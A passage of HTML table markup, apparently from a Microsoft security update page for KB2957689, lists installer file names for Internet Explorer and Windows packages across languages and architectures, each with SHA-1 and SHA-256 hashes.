class=\"sbody-td\">A39F810C26A8675C9E3B4DAA0C5ED0916460010B</td><td class=\"sbody-td\">6743396DB43C4A51E74C0F0B47FCC17896BEEFBA1806C368E0EC618D41BEDCBB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-PTG.exe</td><td class=\"sbody-td\">8F144E54951CA5792AA8FD53023AF0E3BF21DE86</td><td class=\"sbody-td\">801B7B4C4682A63D5AAEBDDFAE131772EA802DC8DEAE61D82A0AC6ADC22AE79E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-RUS.exe</td><td class=\"sbody-td\">95025A856EC11F414F4325E71A47C891F07677F6</td><td class=\"sbody-td\">70966409D3E51BE5564FC04D4EEAF7BFA82477E0AA215506E6E7C6FD595335C3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-SVE.exe</td><td class=\"sbody-td\">B0579D3090FE579A7F357CD215B6D1ADBA0F60B9</td><td class=\"sbody-td\">20C66DA42559A79848E10D9367646CFA5BBB23C2A702D1EE75C9330031C53F98</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-TRK.exe</td><td class=\"sbody-td\">E3A97668BA685AE3D4F33D1D0ADEBDF78711B0B6</td><td class=\"sbody-td\">FCBDC9DB418B58BC788547D04194C09B6A44F9DE7240B6E6A731DDA4F88B9EE1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-ARA.exe</td><td class=\"sbody-td\">8621CBB0E103C0D35C7E4DC095DBBC2C20F3A184</td><td class=\"sbody-td\">742CB15DB505DE8CB92A94C16392B7A8046AD78269C908622E336EDB14719C8A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-CHS.exe</td><td class=\"sbody-td\">9EEE4467815EC75D9220E02AA845B2508BB3828D</td><td class=\"sbody-td\">F35EF1AABC7EA2E37E5B8B104CAACE54C7B2EBD58584F743F0000D11FA2C4FB5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-CHT.exe</td><td class=\"sbody-td\">F489DD7D8C9A7BDDF0A3F37E5A75D735A621A6D0</td><td class=\"sbody-td\">2A9E7369BA647B42C9AE202FB286EE7A7A94F7439F654D191F61A5454615C39A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-CSY.exe</td><td class=\"sbody-td\">E09E36558B96CAE74686BEDF29706B2B7D650B63</td><td class=\"sbody-td\">67F03838072C077DC0B22C5765EE02F3B3E602211480EA7BF43CACDF5E9B797D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-DAN.exe</td><td class=\"sbody-td\">A08CDBE2D073527BCE607B831443621F082AB2BA</td><td class=\"sbody-td\">AA8436AB64CD1407A8640A00CF2F149070C9FE73F3410CD1C8DFF3C07AA7A68D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-DEU.exe</td><td class=\"sbody-td\">CCCB7035359C8C523ABCCD43969E40691C8C47D2</td><td class=\"sbody-td\">4EDE87A2923A6B7EF5F5C728CAD61BDBB00F3FE7C87372F05EBBBFADAEA3E485</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-ELL.exe</td><td class=\"sbody-td\">2B587DFE7C8EF59ACD97F2310D8F486EEFA53EEB</td><td class=\"sbody-td\">F509BEE0F143DDFCF1E2C8A1EBE42ECED8C224DD487E1D74E7529C26E56B7B21</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-ENU.exe</td><td class=\"sbody-td\">234F8D7B32CC0458642E0B57A8C790EA70269448</td><td class=\"sbody-td\">2771141BB7EE6B9278CCE030ED3047FA1C1CCD19605916A642711890B49A04F1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-ESN.exe</td><td class=\"sbody-td\">4874DB4253B093A0B9231F14C47357228C6FD9DD</td><td class=\"sbody-td\">99B7897D0E5CF82664402E0024A1E15368DA3CB4C1EC1AA467AD478BC2FAA1FB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-FIN.exe</td><td class=\"sbody-td\">839DB82896E54B510F580332AD4C26F0BB0073E2</td><td class=\"sbody-td\">9FCFEAC9A18D8DC3492B4C4F00AADD9A35158F01888D704320CC2D0F2FCFC9FF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-FRA.exe</td><td class=\"sbody-td\">A8BCCD7C5E0765C4E5B3B63C4371691F3150E566</td><td class=\"sbody-td\">B8D687C646EFF17DA3BAA02C635AA99B9639F97DD419AE26E4A7F8D10839DA6D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-HEB.exe</td><td class=\"sbody-td\">A674292FFC95F8482C11F933656ABCA297945734</td><td class=\"sbody-td\">421D65516A61ADDDE8791146CD50F93B9F20DF7DCCE129ED109828973F7A2B0C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-HUN.exe</td><td class=\"sbody-td\">84C9377C5A2FCDA88462AB876E68C8588AC3F27E</td><td class=\"sbody-td\">FEAD6166692DCD529A7147B583CC8457EDA9339380C1540501EDD7BD174DC7C6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-ITA.exe</td><td class=\"sbody-td\">B4025E9827B5CD8F6E9A80E6A23B60028F43E2DE</td><td class=\"sbody-td\">4008DF09895D24C598692F64E57ABBB12971560941841ABDB1E5F62199B8A9BB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-JPN.exe</td><td class=\"sbody-td\">0D83625A714D1859CAA3803BFBE6C74D5B27C1FC</td><td class=\"sbody-td\">B0DD15C3B9A6F5ACEE0F2957320C2AAF126B8D3C5BC3222A196695ED4FFAE971</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-KOR.exe</td><td class=\"sbody-td\">8DDD30101253B9721438C486415B50A1CB139BB7</td><td class=\"sbody-td\">D4ECFED94DDECE73E87339B09CF5D1E01B6431E9B71D80BE07FA2F447A95CDAA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-NLD.exe</td><td class=\"sbody-td\">B20C4D57B95C1D2315BFB2D3C186E266F8E940B9</td><td class=\"sbody-td\">29EB016A8527B89251A5EB248386D64C48A096584DC7937BEA8897F445CCED66</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-NOR.exe</td><td class=\"sbody-td\">D9865A182576607E8C3EF50E7B02CC624354A7C0</td><td class=\"sbody-td\">49AEE3814E653FD5ED562BB2F0B3728CC947B86624748ADC8D4F8812FEC597E7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-PLK.exe</td><td class=\"sbody-td\">14A90A70FEC03D8FD8DE243EEC1A6F52838640A4</td><td class=\"sbody-td\">B939135B0D3D206C6FE2A7296AF3D8744897056B8CCD2B602F9DF6C2D40A4A4A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-PTB.exe</td><td class=\"sbody-td\">9F0A767AEBC93A0E92CF72D00C1FEEE3E6C90777</td><td class=\"sbody-td\">82A1A3EADCAFB46C56B091A4A7CDD6E281CFEFE35540CA4179A15AF9F3385F47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-PTG.exe</td><td class=\"sbody-td\">66020E95F7DFBE8F58BAF1456B0E7337F13D4BE9</td><td class=\"sbody-td\">1C284F2D512ED43ABFA5BFA755A45E00094DBB6DE6762FDD8E44888DE9D80088</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-RUS.exe</td><td class=\"sbody-td\">6458B81996071FB792D8483530EC4144395A04AC</td><td class=\"sbody-td\">6F7E0EC51C0FAA598C6E59A44592B13CF3C1B366EB8FEBEF3FF1E476DBDD37AE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-SVE.exe</td><td class=\"sbody-td\">43833FDAD087B61B45010AA92EC7F21E3ADBBDA2</td><td class=\"sbody-td\">3FABF5B0AD47945E2ECF5697E552B3F3ABD67FCD54FC03BC59B33F91D834254E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsXP-KB2957689-x86-Embedded-TRK.exe</td><td class=\"sbody-td\">E19AE84C40BA4C7263C1E0BED88C77ACFF57FF9A</td><td class=\"sbody-td\">63D092336A6A92AD887885AB827F57C92ADC083CC7F0EF685938933B09ACC262</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB2957689-x64.msu</td><td class=\"sbody-td\">CE0549F8CE4D87A94F2A607593851AD6AB69BA27</td><td class=\"sbody-td\">2453307C942B08BF91706602FCCD1BA86AF7680E4FBAE0B200DDE96784B42527</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB2957689-x86.msu</td><td class=\"sbody-td\">26ED8DAC2A61195996AF567D6CBAACC7891D59AB</td><td class=\"sbody-td\">369217192003DF26277713776DC8F8190508A42C0872424639E18C462AF3C615</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB2957689-x64.msu</td><td class=\"sbody-td\">8FAD9348DB30270675B3B6EC01A2DE4B9AF4D780</td><td class=\"sbody-td\">99E722D2D8BD26D1BFAF9933AE79D7DA1FCBC05CEB68963ADA7CA93FC8416BE1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB2957689-x86.msu</td><td class=\"sbody-td\">BA1EA4975A0CA247E1CF4B5C0957A92B03A726F5</td><td class=\"sbody-td\">55C536BC54D8DC6F13DB14206A3B5B7AA2891630E4DFFD2552F0834526DFC05D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2957689-ia64.msu</td><td class=\"sbody-td\">892120A27491BA4DA271773B0BCEEA40384F75F9</td><td class=\"sbody-td\">36C4A3FEEE7730A740C29ACDCA7EF2F396F52029DF31AC589B7803336500D979</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2957689-x64.msu</td><td class=\"sbody-td\">3578D2B86221AA5B733D65AB9757D1BDE0655863</td><td class=\"sbody-td\">4ABB2725FF8F4D87B65E7D2B46E075080CC3136488DDD560D2BED3CA75488633</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2957689-x86.msu</td><td class=\"sbody-td\">C0AECF3B67A8F3EE7F0FB5584209B9D40B258671</td><td class=\"sbody-td\">EEB81AA62731FEE441CD1B3628886A17EE005C39DCF4BF16E403E6D083C1C784</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2957689-ia64.msu</td><td class=\"sbody-td\">109BA7A8627691FAE4179F389F6153D270ACB1D1</td><td class=\"sbody-td\">23D86449C6D4439A7CCAF4944ACE46FF1C3DD1F6CFBA361F92E47DF21743AE44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2957689-x64.msu</td><td class=\"sbody-td\">41562939743723CBA3F00FFC721354C7EB16DFAA</td><td class=\"sbody-td\">395CE8A834A160CCC53EF6ED8F36485A886EBA6B2AE3C8EC8D1A7EDB7CDA6F6A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2957689-x86.msu</td><td class=\"sbody-td\">892522AF8C68B405503A3694DF3D179302BC7A6F</td><td class=\"sbody-td\">06351FE5BEE90065283D80FF82ACA6947CA9639A46F3CCB150AF56C8C70B9B38</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2957689-x64.msu</td><td class=\"sbody-td\">DD71F9060754525BA5197F227B00EC1078451B70</td><td class=\"sbody-td\">051CEDE0D0055C4A439B0B2A2C4C11D0C97E73E6A8067602F3300019D7E76932</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2957689-x86.msu</td><td class=\"sbody-td\">71515E7505A41696FF8670BB6C2BD5A3C083F8E2</td><td class=\"sbody-td\">543CC32D457E261D26A2148B68F7EF7D9A31421710638C1A5A05E777201308D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2957689-x64.msu</td><td class=\"sbody-td\">2DBC325B6A1E5648AD73EBC37E015C123D0C17DE</td><td class=\"sbody-td\">30CAD8C58B71996D93EB76B46A03BDC27FD35A5226137048CDC75A19AD349188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2957689-x86.msu</td><td class=\"sbody-td\">1F2BCBE3789C9BBCAE51625B27D7B79CE03975A2</td><td class=\"sbody-td\">05677C495B117D5569C6A04B8809F58FB08EE4B92A46A2E21B7FD77E66109F1B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2963950-x64.msu</td><td class=\"sbody-td\">970380F564EAAE5751DE585B787D40B94C33280F</td><td class=\"sbody-td\">4818DB8BCAFCC85A3E6B9F95715D199A21B302C8A67F3128BEA62F814F324227</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2963950-x86.msu</td><td class=\"sbody-td\">21FBE6655A0A95ADB3FE8BE11ED717CBCDC16647</td><td class=\"sbody-td\">40D151A8AF8014511867C5E645EFCA7499C87BCFA2633D623D591FBA86C02C35</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-ia64-DEU.exe</td><td class=\"sbody-td\">C5A5A640B12B0F5886BF4A13A6F137A03D5D82F3</td><td class=\"sbody-td\">BCCBB6872A17046953E932F56CCA1E091216360FC4B7DCDB9D57C01D3121040A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-ia64-ENU.exe</td><td class=\"sbody-td\">64FAC90A875F012A80B56E7290CF3A3D7BE42FDB</td><td class=\"sbody-td\">CA5E0D55593B184A365FA5472B7999B157F91B157FCCB9B797934F7FCBA035C2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-ia64-FRA.exe</td><td class=\"sbody-td\">CABA5B48491C878D195F47816DB2CC633677186A</td><td class=\"sbody-td\">561DAAE02D73240F63675016284C87FCDAA24A64812D6D2C2F64529149482ADF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-ia64-JPN.exe</td><td class=\"sbody-td\">50BE15664C56CF53DDB5AB2EA778AC6856324537</td><td class=\"sbody-td\">6520FEA3566BBE601BE5148F2DEC0759483086ACCB009154CFC6AE3147F8749E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-CHS.exe</td><td class=\"sbody-td\">5B4366CDFBC3246F47AF585EB4DA55DF85A87757</td><td class=\"sbody-td\">E47BAA9138C91454A09DA608F7FDCFACD2BC58EABD7CFA22AA717BC45585231F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-CHT.exe</td><td class=\"sbody-td\">0C185953FF391A623C382E8A7BE5391F317F6527</td><td class=\"sbody-td\">CE9EDC6F62BD7A1C5926342A71BB6F25CA0DC492688859F4F76CD01AB4A18BD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-DEU.exe</td><td class=\"sbody-td\">27AC01733EE52FC51810F242D8A42E2352D29CFF</td><td class=\"sbody-td\">03A37A7D63ABC3A04104ABF4B1A6A7E6C73C3A97AFB1258ADD618B54032B5C92</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-ENU.exe</td><td class=\"sbody-td\">EE208D7C9B49600A0A62B0CF07DAFBE7337D91E3</td><td class=\"sbody-td\">88F41465767D607D550F129B89BD7803A733C4421D6E60B0083F1C707643253C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-ESN.exe</td><td class=\"sbody-td\">F7A02267F52EBD0FA0FB02584EC1B54AF6DA6391</td><td class=\"sbody-td\">E3A01805070E6EB0E66D65BA6F41416825C14B2F19CAB7915973239B16937089</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-FRA.exe</td><td class=\"sbody-td\">75487A20A3EF37C589B59D59391F5079F45459F3</td><td class=\"sbody-td\">D63E8F898DFAD9F0DD5B9E428C02434F00DFF3D9394634660F66044063E7846F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-ITA.exe</td><td class=\"sbody-td\">8481FA2629FDBB492C2F4420DA7479CF4FDD0E87</td><td class=\"sbody-td\">D4377EC3FCFA215427AF02743C5A78B881D3C9E0627F6B4482FC232F32D6BB8D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-JPN.exe</td><td class=\"sbody-td\">BD192A27EADACFAD6941062A65868B76C6048824</td><td class=\"sbody-td\">3037EB558AF88700BE04CC565C3B8E0E17911CEBA53FA5DA19B1B960AE649D63</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-KOR.exe</td><td class=\"sbody-td\">6716F664C69F8A008D84B1898C65B9A34734C8DB</td><td class=\"sbody-td\">50351522BA8FB1D3BE3708B4328DB09CC8EDA461D893B74430BB156C63C7B7B3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-PTB.exe</td><td class=\"sbody-td\">5D015F1BB097065F3193EA75B9BA98FC682CEA8E</td><td class=\"sbody-td\">E28300D1C85E0C9B2EE4ECD1019E4E21BE0622F0251FBC7DB770A269A803E2F0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x64-RUS.exe</td><td class=\"sbody-td\">7180F87966CC5CD1553B665BD3F2E02968E5E546</td><td class=\"sbody-td\">064A941AAFEC7925B4EC6B704187A6604E77E270BFC0488FD9EE784504554164</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-CHS.exe</td><td class=\"sbody-td\">3B575DEFF9468555D266046C697D5A39EB827F31</td><td class=\"sbody-td\">7F9D68CEB7CEEC0691A94ADC85D410A0173665BAA4E2C9970816882DF4862131</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-CHT.exe</td><td class=\"sbody-td\">EDC94C27C05114702C95321E4753EE66C8389AAA</td><td class=\"sbody-td\">A72947B5D6614FCD5386E4F26D07F9B6886CA4935E0A8913475A91FA062915BD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-CSY.exe</td><td class=\"sbody-td\">3F6BCDEBC69B6C8564F6A27F6F78AE89B5423998</td><td class=\"sbody-td\">DC73F2CD6AB4FB9810B974628F1E81240D471F1B17ED1571DAB83EC061297A10</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-DEU.exe</td><td class=\"sbody-td\">7D41AA1131E941BDC42D890DF996689F3448AA80</td><td class=\"sbody-td\">9E27B08F0A5AD8A6B14CC7647372EB0772D64297A841C3809C872B82183A7A3E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-ENU.exe</td><td class=\"sbody-td\">B139DBB79AC0979E1E939E86ED3A2843E4A28910</td><td class=\"sbody-td\">031A73F0A3218C7B4A90D7C36E9B8E6728D11D3FDBE40C5F46F4E57696B0D391</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-ESN.exe</td><td class=\"sbody-td\">323A02C488214C1EA81B48C983D5C7CC71FC0DE7</td><td class=\"sbody-td\">130B22154459C0AA064755CE4221997D6285C57D7B41CBA84979BC108EABDB44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-FRA.exe</td><td class=\"sbody-td\">48D43F20F57548CBDD288A892525D4C8DDAACCBE</td><td class=\"sbody-td\">D2E7924142A45B70E869E8EA32E0517348DA8741AD0F7AFB800C336EE7DB4E0C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-HUN.exe</td><td class=\"sbody-td\">740DA51DE6AD1841328CB2056452886F7D52B7E7</td><td class=\"sbody-td\">E7177D1CAE9B51CC95F182AF5D5DCC393EB72656C2AFAC853910866B3EBAAA8C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-ITA.exe</td><td class=\"sbody-td\">627A7EB480862373171C67A8A179B59651B9C037</td><td class=\"sbody-td\">0B746BFD435947EF4774890714AADD605E89188BE7B9C2FE2E10287B7200C67F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-JPN.exe</td><td class=\"sbody-td\">D829FA98967481545C14802CE5C39D09AFFEF32F</td><td class=\"sbody-td\">19F4B618299C504232EF5D7C0FCABF511F8764550FFF20A0A7E5789963CA646D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-KOR.exe</td><td class=\"sbody-td\">4EFD5BD8A8D496A2CD784428457DFE33C1F6C7F6</td><td class=\"sbody-td\">FDD712745B890C6D3B0D4785F6F4BFE09C8EB58CE2E3839826423C24A958F0EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-NLD.exe</td><td class=\"sbody-td\">42E4964E8FECC24425E828D39A26E57D07913651</td><td class=\"sbody-td\">DD12C7C46AF7F12E49B6B7A37779928DBC6EE161EF96B07FE36BCB76E47E7B48</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-PLK.exe</td><td class=\"sbody-td\">55392446539FA4F3FCB4F08B222AFE7C838B91BE</td><td class=\"sbody-td\">3B503F8F211972D1638DA4A6AFAB10140B15003ACAFFC18747BDF4F0704CB262</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-PTB.exe</td><td class=\"sbody-td\">E5B4C622E5593410D1F84ABAA0BF9EB83DD2B096</td><td class=\"sbody-td\">7CB7C1EFB5A3431DCED13D209AF68BA1360B8F31B143A9B3B08675CC00D40E0E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-PTG.exe</td><td class=\"sbody-td\">B63AE5C20CECC55C3672813B3C7F09921D5E7A82</td><td class=\"sbody-td\">64DCE90D145FF7323F7BABE6A8BB23D290ADAF1AF22E3913B7074EECB6287134</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-RUS.exe</td><td class=\"sbody-td\">21195E2DA7AD7EF6241F73D22EBF252BB3B955CF</td><td class=\"sbody-td\">C2782815CD53287A92098206671A48D72822F9E8C6950DB3040B8CF89BC23972</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-SVE.exe</td><td class=\"sbody-td\">26EA17D6B5C17AF4B4818BC88D4FDB9D17BDD2C4</td><td class=\"sbody-td\">3E2A78F6CBB95834F8599E635BB20A1DB96FDF427B72D1A5EC26A29D15613AE3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2957689-x86-TRK.exe</td><td class=\"sbody-td\">6655C2A0EF3EDB2DCFDF7EC13823233C9FA6BD0A</td><td class=\"sbody-td\">E6042444FF05BA1E92C1D778884C21354535C3612573FB5868C1331A0E1A5367</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-ARA.exe</td><td class=\"sbody-td\">63068A395A1C74EA287E1941A02BC1D27EAA24AE</td><td class=\"sbody-td\">C0FFA5960CFAC50AE567CCB0C2EE82F60126957FF3025EC700F69A48802CCAEA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-CHS.exe</td><td class=\"sbody-td\">6DF9D5E3A6B7C8FC1EB3F734236ABCE18928BE9F</td><td class=\"sbody-td\">1ED3D16FA81F27E234567B3D9E54D1C5CC8733BEB4885D764B4B8C8B82C89DD5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-CHT.exe</td><td class=\"sbody-td\">A1BD5B494A3C5C63253FEF7527F0F3431443C78A</td><td class=\"sbody-td\">0198994E6CC1410148C928AD45AF6C8F3130FF7E73BD23F0C701369DC1B0B61F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-CSY.exe</td><td class=\"sbody-td\">CB2C3495B56E4DC9529E172F53960A3E2C09FE55</td><td class=\"sbody-td\">9C1BE36AC9123041F4378A0C82C28902015CFF23D55D15EA5D4D38E3DD0741FA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-DAN.exe</td><td class=\"sbody-td\">9C989BAE10205757E5EC83D528BE0CBDFC548DDB</td><td class=\"sbody-td\">F17B3CDE36AC5B1B6C1630A8B77E14B4F8C94B46B09D76B6B4F04A15D21EF7DF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-DEU.exe</td><td class=\"sbody-td\">9B1734399E3CDD76EC9F1496030168DF36657C80</td><td class=\"sbody-td\">EBAD31B151FA2EFCBE43A3FA14EF0690C4F62100FB470544ABF6A7E16FFB09F0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-ELL.exe</td><td class=\"sbody-td\">D9C02363D31B0B469BF60CB2228E1AD43CFA542A</td><td class=\"sbody-td\">13D6D3D326E73BF484E4AA2120798CF2C25D68BE9993C4CB082C3F14961DECD7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-ENU.exe</td><td class=\"sbody-td\">28CBF8573434BF2485FBFDC958F48B2B4DEFAD81</td><td class=\"sbody-td\">57C7E2BBBE58E62950E34A1D3450E6B586600AD22F158B571D2DC0BADA4589DD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-ESN.exe</td><td class=\"sbody-td\">7A438843160DD16B9718867C4219F12F61A67346</td><td class=\"sbody-td\">0C5B10B0A0B94B55B82FA047EE94330AA2E0C36760954EE45E25721AF43150BF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-FIN.exe</td><td class=\"sbody-td\">B88440A7CB61EB46A758B173808F160BA6EFB876</td><td class=\"sbody-td\">E3F096CA68F7C5028A483D591C66AD19E7CDB2DEC5F2C7A8E189F93F351F808D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-FRA.exe</td><td class=\"sbody-td\">7140BAC376BF0E6329FC84631D06A4ACAD040DED</td><td class=\"sbody-td\">E7E8CEF9D586706CAF9B1AD82859AD254B1D9AF4D2C89FAB127E050591F4A557</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-HEB.exe</td><td class=\"sbody-td\">87430C4ECBBBD701530A28F8D7F5381423C33643</td><td class=\"sbody-td\">32103FC1E36976C17A9EA88B4EBAC4D08A6D36797839C5B35F3988D9EC447C94</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-HUN.exe</td><td class=\"sbody-td\">786EC9BECDC9E5E7DD92394B9556D5D3C4F44E1C</td><td class=\"sbody-td\">3E9FB3E0697F947D36FAA24A4F89B2E1C043EF896872EE4899A970506EA4C1E1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-ITA.exe</td><td class=\"sbody-td\">75ABF7148E1879035CA69E66E39D1A179EC39F39</td><td class=\"sbody-td\">BA1CD65B891C16751AAC43736F91268B20D0306DD8ED57583A90C65A0F965AF1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-JPN.exe</td><td class=\"sbody-td\">95052FC778ACBCE5FC6F5C54B3E1DBAC154830D4</td><td class=\"sbody-td\">083F91F598459A3FC34AD6734DCDB106B0ACF71A1942D9FA8AFB9E0D20C45AA9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-KOR.exe</td><td class=\"sbody-td\">69460CB85B7030711AF947817B158023C494278C</td><td class=\"sbody-td\">60EBE8F947D7B07B5365FA5FA1CBD95716A96FAD45415829FF87309144FC2EB8</td></tr><tr 